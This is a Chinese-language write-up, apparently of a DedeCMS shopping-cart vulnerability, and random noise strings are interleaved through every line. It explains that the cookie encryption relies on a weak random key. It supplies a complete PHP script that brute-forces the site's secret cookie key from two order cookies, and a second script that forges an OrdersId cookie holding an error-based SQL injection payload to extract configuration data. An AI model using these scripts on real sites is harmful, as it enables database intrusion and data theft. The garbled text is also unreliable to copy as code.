www.xxx.com/plus/search.php?keyword=6 B% P; O- I2 w0 d
在 include/shopcar.class.php中
# z% N) e! L+ S/ x7 Y# @5 |先看一下这个shopcar类是如何生成cookie的, j: \; n" m& e* [" z) b) }/ U
239 function saveCookie($key,$value), ~) s2 T& w6 G5 s! [$ W: s+ ?
240 {
5 X h" g3 M9 R! }6 l9 W241 if(is_array($value))6 w- E i, @& d7 X5 b: [
242 {
$ i: P% z! f8 }: a$ I243 $value = $this->enCrypt($this->enCode($value));
, V' a) v' i' K6 A6 v244 }& b$ P5 n' D/ N4 ~7 a$ k$ p+ O
245 else/ L N' K+ u! V6 a0 b1 z
246 {9 _/ O# K H" T2 J
247 $value = $this->enCrypt($value);
G' [6 d5 E% |- f2 z248 }
2 p% n) {) ^. Y! [4 W4 {; f249 setcookie($key,$value,time()+36000,’/');) h; y% l9 _. F
250 }
/ y" o2 D' r8 I+ H1 }4 X5 Q# X简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
5 ]/ M3 U! G* w w+ J( g; z3 D186 function enCrypt($txt)
) R4 R; K* D" u1 X7 [- b187 {; ~+ r- l1 Y3 B+ d
188 srand((double)microtime() * 1000000);
3 q& i4 O3 o* K ?( |3 I/ U189 $encrypt_key = md5(rand(0, 32000));
P+ ^0 D: O) W" J190 $ctr = 0;5 `6 j2 h# _1 d! A$ u% K# ]4 P
191 $tmp = ”;
5 W7 ]$ w7 x) C4 o192 for($i = 0; $i < strlen($txt); $i++)8 _+ S6 C, i/ Q% B4 ^' ^* g! H' |3 b
193 {
: h7 ]+ y: ^* c194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;7 p- T b% E M* i9 `" t" }( N! s
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);5 z$ g: W2 P$ d% K
196 }( }9 f9 M% V p* W S
197 return base64_encode($this->setKey($tmp));
5 B x9 a8 }$ L5 j F198 }
4 n/ a. P! G( ~% D- c! x213 function setKey($txt). {6 w: D$ |, k
214 {2 r- z. X! C# b. G7 n( u6 _ T
215 global $cfg_cookie_encode;
4 Q' o! c% ]) d( q216 $encrypt_key = md5(strtolower($cfg_cookie_encode));% B/ e! s& K1 y- p* v6 {
217 $ctr = 0;) }8 p% w8 L3 V; U' \0 U! R
218 $tmp = ”;+ B$ F M5 V J" @$ Q8 ^& a/ r
219 for($i = 0; $i < strlen($txt); $i++)
- W$ v5 f- r# K2 E3 _+ P2 O5 K220 {
5 n' u, N' g5 G' b6 O221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
S: s# N9 e" u! h222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];7 _" q2 `- K& S) l& P1 }9 P* E
223 }' l) \" P5 f; G, }* N/ c
224 return $tmp;
8 ]/ K/ \* \/ T" L9 p) t6 k2 h225 }( z- M1 i% x" l; q9 G
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
, t& x# e3 u* Q1 D- r# e. h然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。2 I b+ F0 {, L" c$ G
具体代码如下:
# U; C g! f4 A1 V- ^8 t+ H<?php& b7 W8 _* `+ ^9 i" C3 X
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
# M$ Q; {1 A" |# R" H s" o$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
/ K, I# J n$ d" ?+ X% j$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
7 O" U! Q$ e4 o- m6 kfunction reStrCode($code,$string)9 W7 t( }' a( e
{
8 d$ _1 \! H( U$code = base64_decode($code); ]" k) \2 `- N5 i
$key = “”;$ `0 Y9 t2 r" L" ^1 I
for($i=0 ; $i<32 ; $i++)
5 A" H' s" U" l: m4 A{: S- ]% m1 J3 O; _ [" q8 ~
$key .= $string[$i] ^ $code[$i];/ a; p [# C" y7 O! u
}
: Q3 ?; k5 ^: q5 \, p& H& Nreturn $key;
8 M9 {4 I- t. x: N4 |& K}# Q8 W8 U0 `5 j2 y& b A
function getKeys($cookie,$plantxt)/ k- s& [% {0 [
{
+ i; H1 W' ]" h7 z$tmp = $cookie;
4 T5 o/ L7 T& h2 U2 d0 U$results = array();% u% ~3 H1 C# _$ o
for($j=0 ; $j < 32000; $j++)
0 X; H) \) i3 i$ K3 m; g( w0 M7 g{; w7 }! D- k& S& s8 L$ s+ s
( t2 W6 b# p4 @
$txt = $plantxt;
1 h' c% v0 K2 h( K$ u2 }0 g$ctr = 0;9 r; T- x n/ ~) U' w6 `
$tmp = ”;- H+ ?$ s9 H1 Z9 ]* m# G
$encrypt_key = md5($j);5 o- \; t* v& v1 M( R
for($i =0; $i < strlen($txt); $i ++)) C- {6 k L3 C
{
4 P6 m, W* k. A+ u* I3 b* V$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;, t: k5 Y. B- ?0 v4 z- h: G, V
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
. z* a' h* z/ b* n' T& v}! r( v: x" U( \% t. k8 r4 Y) h
$string = $tmp; C! q# Z% N" i" O, ^2 N8 e% K
$code = $cookie;
8 I+ u0 ^! F/ ~- G4 D; Z$result = reStrCode($code,$string);
( M1 i+ K* I8 d. M2 D3 |0 Dif(eregi(‘^[a-z0-9]+$’,$result))
6 m* v! C/ t# e& J ?' l' v, z{
: n+ E4 q9 Y' _* Aecho $result.”\n”;7 y0 s* T% ?/ y
$results[] = $result;* M& J( R7 z5 R8 i1 H# `0 ?
}
& c# E2 `" U# f6 z! R% Y2 ?}
& X" `7 `; P' }* ^+ l7 preturn $results;
$ ` v1 x, @2 l}2 W) ]3 n. ^/ Q* @
$results1 = getKeys($cookie1,$plantxt);
- M' F; E& O- f+ m$results2 = getKeys($cookie2,$plantxt);
& J b" C9 o$ \; ?7 V) e- ~print “\n——————–real key————————–\n”;2 O; c; Q1 H6 c0 o$ L% M
foreach($results1 as $test1)- w3 X2 B3 N) @( W$ C
{
) c) b9 ^, E& G0 ?( C8 ~9 M) P7 yforeach($results2 as $test2) F; _) z2 J8 o b" h" K9 p
{
. N1 ~ l8 z# E8 @: x$ l; uif($test1 == $test2)
4 D, L8 g. X( c7 Z5 X" d: a1 b; y{) `( C' o9 M/ i8 v, N+ {! _
echo $test1.”\n”;
( @' l3 r, W! Q}. i9 R' h/ w. y4 c! Z2 q" o& v
}0 t: j6 ?2 Z# j# b# t
} T- q7 ]. `" e* m9 m& u
?>: ?2 \$ O$ T; _
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,6 e6 B% j) r+ N; L" ]% \7 h) K
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1+ v8 e- T! n2 q% y& K, w0 n
然后推算出md5(strtolower($cfg_cookie_encode))
2 V* S$ I8 K/ A9 O% c: }得到这个key之后,我们就可以构造任意购物车的cookie
6 R) S, C4 d: j+ F5 T- b2 Y1 S* v接着看
' d3 m: `) I5 k: Z% h20 class MemberShops
2 O, G8 V1 V/ ^6 Z$ T; N H3 s21 {) ^ r. l. {0 d T/ S( ]5 [
22 var $OrdersId;0 T( ^/ [! ?4 J
23 var $productsId;
9 S6 A5 {8 E! W: G2 T1 I; Q24
( L% O3 i2 L$ F0 }. ^25 function __construct()$ Y. d- m; s2 H* x
26 {- A5 x( B( ?- A
27 $this->OrdersId = $this->getCookie(“OrdersId”);9 H' }) b4 c# d1 U7 G6 M7 ^
28 if(empty($this->OrdersId))% ?# o6 U8 l$ |' }0 \+ p
29 {
# }% P. V9 Z& V- s8 |30 $this->OrdersId = $this->MakeOrders();, [- M& B9 g1 m9 ?; O
31 }
, J6 C" {" u2 e( D M32 }2 m9 r* e9 e1 N
发现OrderId是从cookie里面获取的
$ U1 N2 `1 N# B- M- d/ T1 L然后
% Q! d+ p8 j; E/plus/carbuyaction.php中的' |3 ` A5 ~$ m% D: [7 L
29 $cart = new MemberShops();4 d1 H- X& ] _# M ?# b# J6 u y e
39 $OrdersId = $cart->OrdersId; //本次记录的订单号7 V2 z4 U# |8 K' {0 F6 K
……, J& I9 _" y1 R9 ~# q' [" Y9 [8 a
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
. C; C5 k. n% m接着我们就可以注入了- I$ l1 _+ N* D E+ C
通过利用下面代码生成cookie:) p" @6 N& t% w* v( h, S
<?php8 F3 S7 t" J8 u" I0 V
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
* B$ p3 Y9 N, [- k$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
0 }; T, _: [( a* {function setKey($txt)
7 x; X- t+ c) B% }) f; r, L{
" n6 } V/ d) y& J# e* {$ Aglobal $encrypt_key;
& d( w$ I# S Q$ctr = 0;
* b7 D" |5 L1 t& W$tmp = ”;
. p( V( S+ {8 L, [$ H7 K- Ufor($i = 0; $i < strlen($txt); $i++)
& W0 m8 E; X/ W{
& D; L7 F: ~* ?$ ~6 r% d3 C% G$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;# P- i: g- x1 W0 P3 h, k. |0 y
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];' | q% v0 t( f+ y! K1 H2 n+ g9 q
}
! m4 {0 O& o1 Preturn $tmp;
% q. `: k8 }4 v$ C}
3 {6 h) @: W0 f; O% o/ Efunction enCrypt($txt)& B( J5 k8 a8 W6 s5 z
{( D( W5 Z+ [* f6 z
srand((double)microtime() * 1000000);
+ E: s A( z0 F. l- @, R! {$encrypt_key = md5(rand(0, 32000));
2 u9 K- e; G! B+ U- v3 V$ctr = 0;
* l7 I" A2 w( C0 ]2 W9 Q1 T2 q. ]2 C3 t$tmp = ”;, E: w2 }+ a/ _% g& Q4 g( [
for($i = 0; $i < strlen($txt); $i++)
) J9 [$ W6 {& l: l% z{
) L( O, P' ^3 |$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
9 G _$ m* @0 `# l" C0 H$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
2 W0 v3 q2 z; v, C}6 f7 D! L4 n; Y3 s: g& R
return base64_encode(setKey($tmp));& S9 e0 F7 N: e2 L/ I5 K5 d/ _8 s
}
6 ?% U5 C- _( G) W i# \* pfor($dest =0;$dest = enCrypt($txt);)# E: }4 E; B% V) L; l
{
/ O! p& J+ z- _) }) P1 X. Y Rif(!strpos($dest,’+'))
! F. P& N0 \' n6 L{
' |( C! j% t' O: c+ [: O/ ~break;) @, y+ K; A1 N$ c
}
) D; b- x C7 f: f( P) @2 x$ M2 T}
4 Z C8 O5 [/ ~1 l1 K9 N$ X; Becho $dest.”\n”;; G2 G6 Z E6 G: N9 j9 _
?>4 ^6 X. M5 e4 D0 ]0 U1 [& h( Z7 W
& \* I, a( c. O7 L' J7 e |